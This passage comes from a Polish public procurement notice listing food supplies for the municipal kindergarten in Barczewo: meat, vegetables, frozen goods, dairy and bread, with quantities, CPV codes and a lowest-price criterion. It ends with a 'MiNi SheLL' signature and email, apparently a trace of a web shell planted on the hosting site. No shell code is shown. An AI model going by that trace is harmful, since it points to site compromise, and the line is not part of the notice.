Szt
20
42.
Liść laurowy w oryginalnych opakowaniach
Szt
20
43.
Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.
szt
8
44.
Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik
Szt
20
45.
Kukurydz konserwowa puszka op.400g
Szt
25
46.
Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g
szt
25
47.
Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym
Szt
15
48.
Koncentrat barszczu czerwonego w op. szklanych
szt
10
49.
Groszek konserwowy w puszce w oryginalnych op.400g
Szt
10
50.
Papryka mielona słodka w oryginalnych op.20g
Szt
50
51.
Przyprawa Curry op10-20g
Szt
15
52.
Przyprawa Kurkuma  op.10-20g
Szt
10
53.
Majeranek otarty waga co najmniej 8g
szt
30
54.
Wafle suche prostokątne
Szt
120
55.
Nutella w oryginalnych op.320g lub produkt równoważny.
Szt
12
56.
Zioła prowansalskie w oryginalnych opakowaniach op.10g
szt
40
57.
Cukier waniliowy
szt
60
58.
Kwasek cytrynowy
Szt
30
59.
Musztarda słoik op.co najmniej 180g
szt
20
60.
Miód naturalny wielokwiatowy op.370g
Szt
25
61.
Ananas plastry puszka waga bez odcieku co najmniej 565g
szt
15
62.
Czekolada mleczna 100g
Szt
100
63.
Cukierki czekoladowe typu michałki lub równoważne
Kg
15
64.
Proszek do pieczenia
Szt 
15
65.
Sok owocowo-warzywny op.co najmniej 700ml
L
350
66.
Syrop owocowy 62%ekstraktu owocowego butelka szklana op.co najmniej420ml
L
80
67.
Makrela w sosie pomidorowym bez warzyw op co najmnie 200g
Szt
120
68.
Paprykarz  op co najmniej 150g
Szt
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Karkówka surowa wieprzowa bez kości
Kg
90
2.
Łopatka wieprzowa surowa bez kości
Kg
300
3.
Wołowina surowa zrazowa bez kości
Kg
50
4.
Szynka wieprzowa surowa bez kości
Kg
60
5.
Filet z indyka surowy
Kg
40
6.
Filet z kurczaka surowy
Kg
130
7.
Schab bez kości surowy 
Kg
40
8.
Udka bez grzbietu z kurczaka surowe
Kg
150
9.
Antrykot wołowy surowy
Kg
15
10.
Żebra wołowe surowe
Kg
15
11.
Porcje rosołowe z kurczaka
Kg
50
12.
Wątróbka drobiowa surowa
Kg
30
13.
Parówki wieprzowe cienkie zawierające co najmniej 60% mięsa wp.
Kg
50
14.
Ogonówka wp. parzona zawierajaca co najmniej 64% mięsa wp.
Kg
15
15.
Schab wędzony parzony zawierajacy co najmniej 73% mięsa wp.
kg
15
16.
Polędwica wp wędzona parzona zawierajaca co najmniej 63% miesa wp.
Kg
15
17.
Szynka wędzona parzona  mieso wp. 100%
kg
25
18.
Kiełbasa wp-baton zawierajaca 100% mięsa wp.
Kg
25
19.
Szynka wędzona parzona -mięso wp.77%
Kg
25
20.
Szynka konserwowa-mięso wp 65%
Kg
15
21.
Kiełbasa wp. cienka zawierajaca  co najmniej 63% mięsa wp.
kg
30
22.
Kiełbasa wp.cienka zawierajaca co najmniej 79% misa wp.
Kg
30
23.
Pieczeń wp. zawierajaca co najmniej 60% miesa wp.
Kg
20
24.
Mielonka wp. zawierajaca co najmniej 70% miesa wp.
kg
15
25.
Filet wędzony z indyka  zawartość mięsa z indyka  co najmniej 90%
kg
15
26.
Filet wędzony drobiowy zawirajacy co najmniej47% mięsa z kury.
Kg
15
27
Parówki drobiowe zawierająca co najmniej 60% miesa drobiowego
kg
30
28
Polędwica drobiowa z kurczaka z majerankiem zawierająca co najmniej 45% filetu z kurczaka
kg
15
29
Piers miodowa z indyka zawierająca co najmniej 51% filetu z kurczaka
kg
15
30
Kiełbasa wp.baton zawierająca co najmniej 60% miesa wp.
Kg
20
31
Łopatka pieczona -mięso wp.co najmniej 85%
Kg
20
32
Smalec wp. kostka 200-250g
Kg
20
33
Pasztet pieczony drobiowy zawierający co najmniej 38% miesa wp.
kg
25
34
Pasztet pieczony wp.zawierajacy co najmniej 30% miesa wp.
Kg
25
35
Boczek wędzony parzony
Kg
15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców,orzechów.
CPV:  03.20.00.00-3
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Ziemniaki
kg
3500
2.
Marchew świeża korzeń
kg
250
3.
Pietruszka świeża korzeń
kg
30
4.
Cebula biała
kg
50
5.
Cebula czerwona
kg
10
6.
Seler świezy korzeń
kg
80
7.
Por świeży
kg
40
8.
Kapusta czerwona 
kg
40
9.
Pieczarki świeże 
kg
40
10.
Czosnek kraj pochodzenie polska głowka 
szt
50
11.
Szczypior świeży pęczek
szt
100
12.
Rzodkiewka pęczek
szt
100
13.
Rzodkiew biała świeża
Kg
40
14
Sałata lodowa ,pakowana główka
szt
40
15
Sałata  zielona świeża główka
Szt
50
16
Pomidory czerwone, świeże
kg
90
17
Ogórek swieży,zielony szklarniowy
kg
80
18
Ogórek kwaszony
Kg
40
19
Kapusta kwaszona biała
kg
120
20
Kapusta pekinska 
kg
30
21
Kapusta biała słodka  główka
kg
120
22
Papryka czerwona ,żółta,zielona
kg
25
23
Cytryna świeża
Kg
25
24
Jabłka świeże
kg
900
25
Banany świeże
kg
150
26
Gruszki świeże
kg
90
27
kiwi
Kg
40
28
Mandarynki  świeże
kg
150
29
Winogrona zielone bezpestkowe
kg
40
30
arbuzy
Kg
20
31
Śliwka fioletowa duża
kg
30
32
Brzoskwinie
kg
30
33
nektarynki
kg
30
34
morele
kg
30
35
Koper zielony,świeży pęczek 100g
Szt
300
36
Natka pietruszki świeza pęczek  100g
szt
300
37
Burak czerwony świeży
Kg
200
38
Rodzynki op.co najmniej 100g-150g
Szt
20
39
Orzechy włoskie łuskane op.co najmniej100g
szt
10
40
Fasola sucha średnia  op.400-1000g
Kg
20
41
Groch połówki op. 400-1000g
kg
20
42
Pietruszka suszona natka op.50-100g
kg
1
43
Włoszczyzna suszona op.100-200g
kg
1
44
Koper zielony suszony op 50-100g
kg
1
45
Pestki słonecznika op.50-150g
kg
1
46
Żurawina suszona op.250-500g
kg
3
47
Cebulka suszona op.50-100g
kg
1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrozone) PCV 15.20.00.00-0;15.33.11.70-9)                                    
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)
kg
640
2.
Mieszanka 7-składnikowa z kapusta 2000-2500g
kg
110
3.
Brokuły mrożone 450g-2500g
kg
150
4.
Kalafior mrożony op.450-2500g
kg
150
5
Fasolka szparagowa żółta cięta op.450-2500g
kg
120
6
Fasolka szparagowa zielona cieta op.450-2500g
kg
120
7
Szpinak mrożony mielony.op.450-2500g
Kg
60
8 
Groszek zielony mrożony op.450-2500g
kg
45
9
Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g
kg
60
10
Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 
Kg
300
11
Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna
kg
250
12
Truskawka mrożona op.450-2500g
Kg
80
13
Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g
Kg
100
14
Warzywa na patelnie (skład:cukinia,fasola,kalafior romanescu,marchew,papryka,cebula,kukurydza)op.450-2500g
kg
80
15
Marchew kostka op.450-2500g
kg
100
16
Marchew z groszkiem op.450-2500g
Kg
100
17
Wiśnia b)p op.450-2500g
Kg
45
18
Porzeczka czarna mrożona op.450-2500g
kg
45
19
Dorsz filet SHP
kg
54
20
Miruna filet SHP
kg
54
21
Morszczuk filet SHP
kg
20
22
Mintaj filet SHP
kg
30
23
Makrela wędzona
Kg
28
24
Włoszczyzna 3-składnikowa paski op.450-2500g
Kg
150
25
Pyzy z mięsem op.500-1000g
kg
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-3

Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Mleko folia 2%op.1000ml
L
4600
2.
Serek topiony o smaku śmietankowym o zawartości tłuszczu co najmniej 24g  op.100g
szt
210
3.
Mleko UHT op.1000ml 2%
L
150
4.
Mleko UHT op.1000ml 3,2%
L
50
5.
Masło ekstra zawierajace co najmniej 82% tłuszczu
kg
200
6.
Jogurt wielosmakowy,waga op.co najmniej150g
szt
1000
7.
Serek homogenizowany wanilia op.co najmniej 135g
szt
880
8.
 Deser waniliowy pakowany op. co najmniej120g
szt
250
9.
Jogurt z kawałkami owoców,waga op.co najmnie150g
szt
1000
10.
Jogurt owocowy (Milko) do picia lub równoważny op.500ml
szt
500
11
Ser żółty zawierajacy co najmniej 45% tłuszczu.
kg
55
12
Śmietana 12% op.200-400g
L
200
13
Śmietana 18% op.200-400g
L
150
14
Twaróg krajanka półtłusty
kg
200
15
Jogurt naturalny op. co najmniej 400ml
L
15
16
Serek topiony kostka 100g z szynka
Szt 
60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-9
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Chleb krojony500g
Szt.
1300
2
Chleb razowy krojony 400g
szt
830
3
Bułki kajzerki 50g
szt
1000
4
Bułka grahamka co najmniej 80-90g
szt
800
5
Chleb wieloziarnisty waga co najmniej 400-500g
szt
100
6
Ciasto drożdżowe
kg
120
7
Chałka zdobna co najmniej 250g
szt
120
8
Babka piaskowa
Kg
60
9
Rogaliki krucho -drozdżowe nadziewane
kg
120
10
Rogale maślane co najmnie 50g
szt
500
11
Bułki czerstwe co najmniej waga 50g
szt
350
12
Bułka tarta
kg
50
13
Bułka słodka z marmolada waga co najmniej 50g
szt
200
14
piernik
Kg
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com